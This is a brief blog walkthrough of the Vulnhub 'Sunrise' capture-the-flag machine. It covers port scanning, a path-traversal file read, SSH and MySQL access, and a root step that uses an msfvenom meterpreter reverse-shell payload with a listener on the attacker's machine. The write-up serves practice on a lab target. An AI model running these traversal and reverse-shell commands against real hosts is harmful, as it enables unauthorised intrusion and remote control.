Vulnhub Sunrise Walkthrough

Scan the host : nmap –A –T4 –p- 192.168.1.6 –vv

Scanning with dirb and with nikto but with port 8080

The host is LFI, trying the results from nikto we get to see the passwd file

There are two users sunrise – weborf , using the same way will try to view their home folder

Inside the file user.txt some kind of code that didn’t crack a6050aecf6303b0b824038807d823a89

Lets try the other user weborf and see what’s in the home folder

Lets try dirsearch, it allow us to see hidden folders if any.

dirsearch -u http://192.168.1.6:8080/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2f

Now we connect to the host using ssh with the username and password

Now there is a SQL database on the host we can use it

Mysql –u weborf –p

Now login using the second password and the username sunrise

Now wine can run windows applications, so all we have to do is create a windows payload and run it on the host with wine and at the same time we make a listener on our machine

msfvenom -p windows/meterpreter_reverse_tcp LHOST=192.168.1.11 LPORT=443 -e x86/shikata_ga_nai -f exe -o shell.exe

and on our machine we set up metasploit

Change directory to root and cat root.txt file

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s